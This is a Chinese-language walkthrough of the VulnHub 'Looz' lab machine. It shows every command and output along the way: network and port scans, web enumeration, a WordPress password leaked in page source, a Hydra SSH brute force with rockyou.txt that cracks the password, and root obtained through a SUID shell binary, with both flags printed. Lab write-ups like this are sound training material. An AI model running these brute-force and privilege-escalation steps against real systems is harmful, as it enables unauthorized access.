Looz
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:76:42:e1 1 60 PCS Systemtechnik GmbH
192.168.56.119 08:00:27:76:a1:7d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.119
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.119 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 22:57 EST
Nmap scan report for 192.168.56.119
Host is up (0.00039s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4802386769719099d50b194c98da50c (RSA)
| 256 3d525e29fb2f29e801e45d1ba11ef34b (ECDSA)
|_ 256 f0f477dc3d53c3c5358287a5ba57b449 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Home
|_http-generator: Nicepage 3.15.3, nicepage.com
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
3306/tcp open mysql MySQL 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
| Thread ID: 5
| Capabilities flags: 63486
| Some Capabilities: FoundRows, Support41Auth, ConnectWithDatabase, InteractiveClient, Speaks41ProtocolOld, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, ODBCClient, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: Lu(eFnu$PEJ"ilc.WN`y
|_ Auth Plugin Name: mysql_native_password
8081/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://192.168.56.119/
MAC Address: 08:00:27:76:A1:7D (Oracle VirtualBox virtual NIC)
Service Info: Host: 172.17.0.3; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.96 seconds
获得Shell
端口3306
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ mysql -uroot -p -h 192.168.56.119
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ mysql -uroot -p -h 192.168.56.119
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)
看一下mysql有无弱口令。
端口80
利用浏览器访问80端口,返回页面源代码中有以下注释:
<!--- john don't forget to remove this comment, for now wp password is y0uC@n'tbr3akIT--->
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ nikto -h http://192.168.56.119
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.119
+ Target Hostname: 192.168.56.119
+ Target Port: 80
+ Start Time: 2023-02-03 23:36:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2023-02-03 23:37:00 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (nginx/1.18.0) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
端口8081
访问8081端口会自动被重定向到80端口
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ gobuster dir -u http://192.168.56.119:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.119:8081
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/02/03 23:41:12 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.119:8081/: Get "http://192.168.56.119:8081/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
用gobuster工具扫描目录出错。
用nikto工具试一下:
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ nikto -h http://192.168.56.119:8081
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.119
+ Target Hostname: 192.168.56.119
+ Target Port: 8081
+ Start Time: 2023-02-03 23:42:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.20
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://wp.looz.com/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7918 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-02-03 23:43:24 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
从Nikto运行结果得知目标主机运行wordpress,利用浏览器访问该文件:
http://192.168.56.119:8081/wp-login.php
从页面源代码得知目标主机记录需要增加到/etc/hosts文件中:
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.119 wp.looz.com
刷新/wp-login.php文件得到经典的wordpress后台登录界面,从前面的注释已经知道用户名和密码,尝试一下是否可以登录后台:
发现可以成功登录(第一次登录失败,提示需要enable cookies,没做任何修改的情况下,第二次登录可以成功)
尝试替换404.php模板时,点击update file,出错:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
尝试用其他方法上传shell,都失败,其实在wordpress后台注意到gandalf也是管理员,看一下是否可以用hydra破解ssh密码
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ hydra -l gandalf -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.119
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-04 00:08:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.119:22/
[STATUS] 136.00 tries/min, 136 tries in 00:01h, 14344264 to do in 1757:53h, 15 active
[STATUS] 105.33 tries/min, 316 tries in 00:03h, 14344084 to do in 2269:39h, 15 active
[STATUS] 98.71 tries/min, 691 tries in 00:07h, 14343709 to do in 2421:46h, 15 active
[STATUS] 98.22 tries/min, 1475 tries in 00:15h, 14342925 to do in 2433:43h, 15 active
[STATUS] 97.24 tries/min, 3016 tries in 00:31h, 14341384 to do in 2458:08h, 15 active
[STATUS] 96.46 tries/min, 4535 tries in 00:47h, 14339865 to do in 2477:49h, 15 active
[STATUS] 96.66 tries/min, 6091 tries in 01:03h, 14338309 to do in 2472:23h, 15 active
[22][ssh] host: 192.168.56.119 login: gandalf password: highschoolmusical
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-04 01:17:21
用了1个多小时才破解出密码。
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-74-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 04 Feb 2023 08:32:46 AM UTC
System load: 0.0 Processes: 133
Usage of /: 80.0% of 6.82GB Users logged in: 0
Memory usage: 41% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for enp0s3: 192.168.56.119
63 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
gandalf@looz:~$ id
uid=1001(gandalf) gid=1001(gandalf) groups=1001(gandalf)
gandalf@looz:~$
gandalf@looz:/home$ cd alatar
gandalf@looz:/home/alatar$ ls -alh
total 44K
drwxr-xr-x 5 alatar alatar 4.0K Jun 7 2021 .
drwxr-xr-x 4 root root 4.0K Jun 7 2021 ..
-rw------- 1 alatar alatar 45 Jun 7 2021 .bash_history
-rw-r--r-- 1 alatar alatar 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 alatar alatar 3.7K Feb 25 2020 .bashrc
drwx------ 2 alatar alatar 4.0K Jun 7 2021 .cache
drwxrwxr-x 2 alatar alatar 4.0K Jun 7 2021 Private
-rw-r--r-- 1 alatar alatar 807 Feb 25 2020 .profile
-rw-r--r-- 1 alatar alatar 0 Jun 6 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 alatar alatar 33 Jun 7 2021 user.txt
-rw------- 1 alatar alatar 734 Jun 7 2021 .viminfo
drwxrwxr-x 4 alatar alatar 4.0K Jun 7 2021 wordpress
gandalf@looz:/home/alatar$ cat user.txt
9acf80de68fbb344573762e84cced6f3
gandalf@looz:/home/alatar$
得到user flag.
提权
gandalf@looz:/home/alatar/Private$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount
/home/alatar/Private/shell_testv1.0
gandalf@looz:/home/alatar$ cd Private/
gandalf@looz:/home/alatar/Private$ ls -alh
total 28K
drwxrwxr-x 2 alatar alatar 4.0K Jun 7 2021 .
drwxr-xr-x 5 alatar alatar 4.0K Jun 7 2021 ..
-rwsr-xr-x 1 root root 17K Jun 7 2021 shell_testv1.0
gandalf@looz:/home/alatar/Private$ ./shell_testv1.0
root@looz:/home/alatar/Private# cd /root
root@looz:/root# ls -alh
total 52K
drwx------ 5 root root 4.0K Jun 7 2021 .
drwxr-xr-x 21 root root 4.0K Jun 7 2021 ..
-rw------- 1 root root 498 Jun 7 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Jun 7 2021 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 33 Jun 7 2021 root.txt
-rw-r--r-- 1 root root 50 Jun 7 2021 rundocker.sh
-rw-r--r-- 1 root root 66 Jun 7 2021 .selected_editor
drwxr-xr-x 3 root root 4.0K Jun 6 2021 snap
drwx------ 2 root root 4.0K Jun 6 2021 .ssh
-rw------- 1 root root 8.0K Jun 7 2021 .viminfo
root@looz:/root# cat root.txt
ab17850978e36aaf6a2b8808f1ded971
root@looz:/root#
成功提权,拿到了root flag.
经验教训
-
在登录wordpress后台后要仔细查看相关信息,尤其是用户信息,会发现有2个管理员用户。
-
然后是破解,虽然本靶机需要非常时间的破解。